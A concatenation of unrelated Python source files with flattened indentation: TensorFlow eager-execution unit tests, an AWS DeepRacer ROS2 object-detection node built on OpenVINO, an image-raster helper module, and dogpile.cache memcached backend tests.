cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(str)
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
context.set_execution_mode(context.ASYNC)
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))
context.context().executor.wait()
context.context().executor.clear_error()
context.context().execution_mode = context.SYNC
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
@test_util.run_gpu_only
def testMatMulGPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3]]),
constant_op.constant([[5]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', 1, 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
    self.assertEqual(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
@test_util.run_gpu_only
def testOperationWithNoInputsRunsOnDevice(self):
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
      self.assertEqual(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
def testConvertMixedEagerTensorsWithVariables(self):
var = resource_variable_ops.ResourceVariable(1.0)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
['foo', var], context.context())
self.assertAllEqual([dtypes.string, dtypes.float32], types)
for t in tensors:
self.assertIsInstance(t, ops.EagerTensor)
# TODO(b/123637108): re-enable
@test_util.run_gpu_only
def disabled_testSmallIntegerOpsForcedToCPU(self):
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.int64)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op forced to CPU since all constants are integers and small.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:CPU:0')
a = array_ops.zeros((8, 10), dtype=dtypes.int64)
b = array_ops.ones((8, 10), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the tensors are larger than 64 elements.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:GPU:0')
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.float32)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.float32)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the constants are not integers.
self.assertEqual(c.device, '/job:localhost/replica:0/task:0/device:GPU:0')
def testExecutionModeIsStoredThreadLocal(self):
cv = threading.Condition()
count = [0]
num_threads = 10
def execution_mode_test(cond, count, num_threads, ctx, mode):
cond.acquire()
# Ensure that all threads set their mode simultaneously
# Note that this is not a simple assignment, as the execution_mode is an
# @property with a custom setter.
ctx.execution_mode = mode
count[0] = count[0] + 1
if count[0] < num_threads:
cond.wait()
else:
cond.notify_all()
cond.release()
self.assertEqual(ctx.execution_mode, mode)
ctx = context.Context()
threads = []
for i in range(num_threads):
t = threading.Thread(
target=execution_mode_test,
args=(cv, count, num_threads, ctx,
context.SYNC if i % 2 == 0 else context.ASYNC))
t.start()
threads.append(t)
for t in threads:
t.join()
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def setUp(self):
super(SendRecvTest, self).setUp()
configure_virtual_cpus()
def testBasic(self):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
@test_util.run_gpu_only
def testLocalCrossDevice(self):
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = constant_op.constant(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
class EagerTensorCacheTest(test_util.TensorFlowTestCase):
def setUp(self):
super(EagerTensorCacheTest, self).setUp()
configure_virtual_cpus()
def testCacheSkipsTensorsTooLarge(self):
cache = context._EagerTensorCache(max_items=100, max_tensor_size=3)
cache.put('1', array_ops.zeros((2, 2)))
self.assertIsNone(cache.get('1'))
cache.put('2', array_ops.zeros((2)))
self.assertIsNotNone(cache.get('2'))
if __name__ == '__main__':
test.main()
|
object_detection_node.py
|
#################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#################################################################################
"""
object_detection_node.py
This module creates the object_detection_node, which is responsible for collecting
sensor data (camera images) from sensor_fusion_pkg and running object detection
on a specified object, providing the normalized delta from the target position
for ftl_navigation_pkg.
The node defines:
image_subscriber: A subscriber to the /sensor_fusion_pkg/sensor_msg published
by the sensor_fusion_pkg with sensor data.
display_image_publisher: A publisher to publish the Image message using
web_video_server.
delta_publisher: A publisher to publish the normalized error (delta) of the
detected object from the target (reference) position
with respect to x and y axes.
"""
import time
import signal
import threading
import cv2
import numpy as np
import rclpy
from rclpy.node import Node
from rclpy.executors import MultiThreadedExecutor
from rclpy.qos import (QoSProfile,
QoSHistoryPolicy,
QoSReliabilityPolicy)
from cv_bridge import CvBridge
from sensor_msgs.msg import Image
from deepracer_interfaces_pkg.msg import (EvoSensorMsg,
DetectionDeltaMsg)
from openvino.inference_engine import IECore
import ngraph as ng
from object_detection_pkg import (constants,
utils)
class ObjectDetectionNode(Node):
"""Node responsible for collecting sensor data (camera images) from sensor_fusion_pkg
and running object detection on specified object, providing normalized delta from target for
ftl_navigation_pkg.
"""
def __init__(self, qos_profile):
"""Create a ObjectDetectionNode.
"""
super().__init__('object_detection_node')
self.get_logger().info("object_detection_node started.")
# Double buffer to hold the input images for inference.
self.input_buffer = utils.DoubleBuffer(clear_data_on_get=True)
# Get DEVICE parameter (CPU/MYRIAD) from launch file.
self.declare_parameter("DEVICE")
self.device = self.get_parameter("DEVICE").get_parameter_value().string_value
if not self.device:
self.device = constants.DEVICE
# Check if the inference output needs to be published to localhost using web_video_server
self.declare_parameter("PUBLISH_DISPLAY_OUTPUT")
self.publish_display_output = \
self.get_parameter("PUBLISH_DISPLAY_OUTPUT").get_parameter_value().bool_value
self.get_logger().info(f"Publish output set to {self.publish_display_output}")
# Initialize Intel Inference Engine
self.init_network()
# Calculate target position for bounding box center.
self.target_x, self.target_y = self.calculate_target_center(self.w, self.h)
# Create subscription to sensor messages from camera.
self.image_subscriber = self.create_subscription(EvoSensorMsg,
constants.SENSOR_FUSION_TOPIC,
self.on_image_received_cb,
qos_profile)
# Creating publisher for display_image.
self.display_image_publisher = \
self.create_publisher(Image,
constants.DISPLAY_IMAGE_PUBLISHER_TOPIC,
10)
# Creating publisher for error (delta) from target bb position.
self.delta_publisher = self.create_publisher(DetectionDeltaMsg,
constants.DELTA_PUBLISHER_TOPIC,
qos_profile)
self.bridge = CvBridge()
# Launching a separate thread to run inference.
self.stop_thread = False
self.thread_initialized = False
self.thread = threading.Thread(target=self.run_inference)
self.thread.start()
self.thread_initialized = True
self.get_logger().info(f"Waiting for input images on {constants.SENSOR_FUSION_TOPIC}")
def init_network(self):
"""Function which initializes Intel Inference Engine.
"""
# Load OpenVINO Inference Engine.
self.get_logger().info(f"Loading Inference Engine on {self.device}")
self.ie = IECore()
# Read and load the network.
self.net = self.ie.read_network(model=constants.MODEL_XML, weights=constants.MODEL_BIN)
self.func = ng.function_from_cnn(self.net)
self.ops = self.func.get_ordered_ops()
self.exec_net = self.ie.load_network(network=self.net, device_name=self.device)
# Read expected input image info from network and prepare input blobs.
# n: batch size, c: no. of channels, h: input height, w: input width
for self.input_key in self.net.input_info:
self.input_name = self.input_key
self.n, self.c, self.h, self.w = self.net.input_info[self.input_key].input_data.shape
# Initializing to float for optimizing in later functions
self.h = float(self.h)
self.w = float(self.w)
# Prepare output blobs
self.out_blob = next(iter(self.net.outputs))
def wait_for_thread(self):
"""Function which joins the created background thread.
"""
if self.thread_initialized:
self.thread.join()
self.get_logger().info("Thread joined")
def thread_shutdown(self):
"""Function which sets the flag to shutdown background thread.
"""
self.stop_thread = True
def on_image_received_cb(self, sensor_data):
"""Call back for adding to the input double buffer whenever
new sensor image is received from sensor_fusion_node.
Args:
sensor_data (EvoSensorMsg): Message containing sensor images and lidar data.
"""
self.input_buffer.put(sensor_data)
def preprocess(self, sensor_data):
"""Method that preprocesses the input data to be provided for inference to network.
Args:
sensor_data (EvoSensorMsg): Contains sensor images and lidar data.
Returns:
            image: Preprocessed image expected by the network.
"""
image = self.bridge.imgmsg_to_cv2(sensor_data.images[0])
ih, iw = image.shape[:-1]
# Resize to required input size
if (ih, iw) != (int(self.h), int(self.w)):
image = cv2.resize(image, (int(self.w), int(self.h)))
# Change data layout from HWC to CHW.
image = image.transpose((2, 0, 1))
return image
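    # Example (illustrative shapes): a 480x640 BGR frame arrives as
    # (480, 640, 3); after resizing to the network input and the HWC -> CHW
    # transpose above, it becomes (3, h, w), e.g. (3, 300, 300).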
def calculate_target_center(self, image_width, image_height):
"""Method that calculates the target center's x and y co-ordinates for
bounding box to be used as reference.
Args:
image_width (int): Width of the preprocessed image.
image_height (int): Height of the preprocessed image.
Returns:
target_x, target_y (float)
"""
target_x = float(image_width) / 2.0
target_y = float(image_height) / 3.0
self.get_logger().info(f"Target Center: x={target_x} y={target_y}")
return target_x, target_y
def calculate_bb_center(self, top_left_x, top_left_y, bottom_right_x, bottom_right_y):
"""Method that calculates the bounding box center's x and y co-ordinates
representing the detected object.
Args:
top_left_x (int)
top_left_y (int)
bottom_right_x (int)
bottom_right_y (int)
Returns:
bb_center_x, bb_center_y (float): Containing the x and y coordinates of
detected bounding box center.
"""
bb_center_x = top_left_x + ((bottom_right_x - top_left_x) / 2.0)
bb_center_y = top_left_y + ((bottom_right_y - top_left_y) / 2.0)
return bb_center_x, bb_center_y
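    # Example (illustrative values): corners (10, 20) and (50, 60) give a
    # bounding box center of (30.0, 40.0).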
def calculate_delta(self, target_x, target_y, bb_center_x, bb_center_y):
"""Method that calculates the normalized error (delta) of the
detected object from the target (reference) position
with respect to x and y axes.
Args:
target_x (float): Target x co-ordinate.
target_y (float): Target y co-ordinate.
bb_center_x (float): x co-ordinate of center of detected bounding box.
bb_center_y (float): y co-ordinate of center of detected bounding box.
Returns:
delta (DetectionDeltaMsg): Normalized Error (delta) in x and y respectively
returned as a list of floats and converted to ObjectDetectionErrorMsg.
"""
delta_x = (bb_center_x - target_x) / self.w
delta_y = (bb_center_y - target_y) / self.h
delta = DetectionDeltaMsg()
delta.delta = [delta_x, delta_y]
self.get_logger().debug(f"Delta from target position: {delta_x} {delta_y}")
return delta
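    # Example (illustrative values): with a 300x300 network input the target
    # is (150.0, 100.0); a detected center of (180.0, 130.0) yields a
    # normalized delta of (0.1, 0.1).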
def run_inference(self):
"""Method for running inference on received input image.
"""
try:
while not self.stop_thread:
# Get an input image from double buffer.
sensor_data = self.input_buffer.get()
start_time = time.time()
# Pre-process input.
input_data = {}
input_data[self.input_name] = self.preprocess(sensor_data)
# Perform Inference.
res = self.exec_net.infer(inputs=input_data)
# Read and postprocess output.
res = res[self.out_blob]
boxes, classes = {}, {}
output_data = res[0][0]
detected = False
for number, proposal in enumerate(output_data):
# confidence for the predicted class.
confidence = proposal[2]
if (confidence > constants.CONFIDENCE_THRESHOLD and
constants.COCO_LABELS[proposal[1]] == constants.DETECT_CLASS):
                        # ID of the image in the batch.
                        imid = int(proposal[0])
                        # Predicted class ID.
                        label = int(proposal[1])
                        # Coordinates of the top-left bounding box corner
                        # (proposal values are normalized to the range [0, 1]).
                        top_left_x = int(self.w * proposal[3])
                        top_left_y = int(self.h * proposal[4])
                        # Coordinates of the bottom-right bounding box corner
                        # (proposal values are normalized to the range [0, 1]).
                        bottom_right_x = int(self.w * proposal[5])
                        bottom_right_y = int(self.h * proposal[6])
# Calculate bounding box center
bb_center_x, bb_center_y = self.calculate_bb_center(top_left_x,
top_left_y,
bottom_right_x,
bottom_right_y)
# Calculate detection delta.
detection_delta = self.calculate_delta(self.target_x,
self.target_y,
bb_center_x,
bb_center_y)
# Publish to object_detection_delta topic.
self.delta_publisher.publish(detection_delta)
# Set the flag that there is a detected object.
detected = True
if imid not in boxes.keys():
boxes[imid] = []
boxes[imid].append([top_left_x, top_left_y, bottom_right_x, bottom_right_y])
if imid not in classes.keys():
classes[imid] = []
classes[imid].append(label)
# Break as soon as specified class is detected.
break
if not detected:
                    # Assume we are at the target position.
detection_delta = self.calculate_delta(self.target_x,
self.target_y,
self.target_x,
self.target_y)
self.delta_publisher.publish(detection_delta)
if self.publish_display_output:
# Change data layout from CHW to HWC.
display_image = input_data[self.input_name].transpose((1, 2, 0))
for imid in classes:
for box in boxes[imid]:
# Drawing bounding boxes on the image.
cv2.rectangle(display_image,
(box[0], box[1]),
(box[2], box[3]),
(232, 35, 244),
2)
                    # Draw the target center on the image.
cv2.circle(display_image,
(int(self.target_x),
int(self.target_y)),
5,
(0, 255, 0),
-1)
# Publish to display topic (Can be viewed on localhost:8080).
display_image = self.bridge.cv2_to_imgmsg(np.array(display_image), "bgr8")
self.display_image_publisher.publish(display_image)
self.get_logger().info(f"Total execution time = {time.time() - start_time}")
except Exception as ex:
self.get_logger().error(f"Failed inference step: {ex}")
# Destroy the ROS Node running in another thread as well.
self.destroy_node()
rclpy.shutdown()
def main(args=None):
rclpy.init(args=args)
qos = QoSProfile(reliability=QoSReliabilityPolicy.RMW_QOS_POLICY_RELIABILITY_BEST_EFFORT,
depth=1,
history=QoSHistoryPolicy.RMW_QOS_POLICY_HISTORY_KEEP_LAST)
object_detection_node = None
try:
object_detection_node = ObjectDetectionNode(qos)
executor = MultiThreadedExecutor()
def signal_handler(signum, frame):
"""Callback function to handle registered signal handler
to join and stop executing running thread created.
Args:
signum: The signal number
frame: the current stack frame (None or a frame object)
"""
object_detection_node.get_logger().info("Signal Handler initiated")
object_detection_node.thread_shutdown()
object_detection_node.wait_for_thread()
# Register SIGINT handler
signal.signal(signal.SIGINT, signal_handler)
rclpy.spin(object_detection_node, executor)
except Exception as ex:
# The node may have failed to construct; log through it only if it exists.
if object_detection_node is not None:
object_detection_node.get_logger().error(f"Exception in Object Detection Node: {ex}")
finally:
# Destroy the node explicitly
# (optional - otherwise it will be done automatically
# when the garbage collector destroys the node object)
if object_detection_node is not None:
object_detection_node.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
|
graphics.py
|
#!/usr/bin/python3
import numpy as np
from PIL import Image
import time
import threading
def save_image(x, path):
im = Image.fromarray(x)
im.save(path, optimize=True)
# Assumes (n_patches, rows, columns, channels) input, matching to_raster below.
def save_raster(x, path, rescale=False, width=None):
# Save on a background thread; the thread target must be the worker
# _save_raster, not save_raster itself, which would recurse and spawn
# new threads indefinitely.
t = threading.Thread(target=_save_raster, args=(x, path, rescale, width))
t.start()
return
def _save_raster(x, path, rescale, width):
x = to_raster(x, rescale, width)
save_image(x, path)
# Shape: (n_patches,rows,columns,channels)
def to_raster_old(x, rescale=False, width=None):
x = np.transpose(x, (0, 3, 1, 2))
#x = x.swapaxes(2, 3)
if len(x.shape) == 3:
x = x.reshape((x.shape[0], 1, x.shape[1], x.shape[2]))
if x.shape[1] == 1:
x = np.repeat(x, 3, axis=1)
if rescale:
x = (x - x.min()) / (x.max() - x.min()) * 255.
x = np.clip(x, 0, 255)
assert len(x.shape) == 4
assert x.shape[1] == 3
n_patches = x.shape[0]
if width is None:
width = int(np.ceil(np.sqrt(n_patches))) # result width
height = int(n_patches/width) # result height
tile_height = x.shape[2]
tile_width = x.shape[3]
result = np.zeros((3, int(height*tile_height),
int(width*tile_width)), dtype='uint8')
for i in range(height):
for j in range(width):
result[:, i*tile_height:(i+1)*tile_height,
j*tile_width:(j+1)*tile_width] = x[width*i+j]  # index by tile, not by row
return result
# Shape: (n_patches,rows,columns,channels)
def to_raster(x, rescale=False, width=None):
if len(x.shape) == 3:
x = x.reshape((x.shape[0], x.shape[1], x.shape[2], 1))
if x.shape[3] == 1:
x = np.repeat(x, 3, axis=3)
if rescale:
x = (x - x.min()) / (x.max() - x.min()) * 255.
x = np.clip(x, 0, 255)
assert len(x.shape) == 4
assert x.shape[3] == 3
n_batch = x.shape[0]
if width is None:
width = int(np.ceil(np.sqrt(n_batch))) # result width
height = int(n_batch / width) # result height
tile_height = x.shape[1]
tile_width = x.shape[2]
result = np.zeros((int(height * tile_height),
int(width * tile_width), 3), dtype='uint8')
for i in range(height):
for j in range(width):
result[i * tile_height:(i + 1) * tile_height, j *
tile_width:(j + 1) * tile_width] = x[width*i+j]
return result
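# Minimal usage sketch (hypothetical shapes and output paths, for illustration only):
#   batch = np.random.rand(16, 8, 8, 3)                       # (n_patches, rows, cols, channels)
#   save_image(to_raster(batch, rescale=True), '/tmp/raster.png')
#   save_raster(batch, '/tmp/raster_async.png', rescale=True)  # threaded variant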
|
test_memcached_backend.py
|
from ._fixtures import _GenericBackendTest, _GenericMutexTest
from . import eq_, winsleep
from unittest import TestCase
from threading import Thread
import time
from nose import SkipTest
from dogpile.cache import compat
class _TestMemcachedConn(object):
@classmethod
def _check_backend_available(cls, backend):
try:
client = backend._create_client()
client.set("x", "y")
assert client.get("x") == "y"
except Exception:
raise SkipTest(
"memcached is not running or "
"otherwise not functioning correctly")
class _NonDistributedMemcachedTest(_TestMemcachedConn, _GenericBackendTest):
region_args = {
"key_mangler": lambda x: x.replace(" ", "_")
}
config_args = {
"arguments": {
"url": "127.0.0.1:11211"
}
}
class _DistributedMemcachedTest(_TestMemcachedConn, _GenericBackendTest):
region_args = {
"key_mangler": lambda x: x.replace(" ", "_")
}
config_args = {
"arguments": {
"url": "127.0.0.1:11211",
"distributed_lock": True
}
}
class _DistributedMemcachedMutexTest(_TestMemcachedConn, _GenericMutexTest):
config_args = {
"arguments": {
"url": "127.0.0.1:11211",
"distributed_lock": True
}
}
class PylibmcTest(_NonDistributedMemcachedTest):
backend = "dogpile.cache.pylibmc"
class PylibmcDistributedTest(_DistributedMemcachedTest):
backend = "dogpile.cache.pylibmc"
class PylibmcDistributedMutexTest(_DistributedMemcachedMutexTest):
backend = "dogpile.cache.pylibmc"
class BMemcachedTest(_NonDistributedMemcachedTest):
backend = "dogpile.cache.bmemcached"
class BMemcachedDistributedTest(_DistributedMemcachedTest):
backend = "dogpile.cache.bmemcached"
class BMemcachedDistributedMutexTest(_DistributedMemcachedMutexTest):
backend = "dogpile.cache.bmemcached"
class MemcachedTest(_NonDistributedMemcachedTest):
backend = "dogpile.cache.memcached"
class MemcachedDistributedTest(_DistributedMemcachedTest):
backend = "dogpile.cache.memcached"
class MemcachedDistributedMutexTest(_DistributedMemcachedMutexTest):
backend = "dogpile.cache.memcached"
from dogpile.cache.backends.memcached import GenericMemcachedBackend
from dogpile.cache.backends.memcached import PylibmcBackend
from dogpile.cache.backends.memcached import MemcachedBackend
class MockGenericMemcachedBackend(GenericMemcachedBackend):
def _imports(self):
pass
def _create_client(self):
return MockClient(self.url)
class MockMemcacheBackend(MemcachedBackend):
def _imports(self):
pass
def _create_client(self):
return MockClient(self.url)
class MockPylibmcBackend(PylibmcBackend):
def _imports(self):
pass
def _create_client(self):
return MockClient(self.url,
binary=self.binary,
behaviors=self.behaviors
)
class MockClient(object):
number_of_clients = 0
def __init__(self, *arg, **kw):
self.arg = arg
self.kw = kw
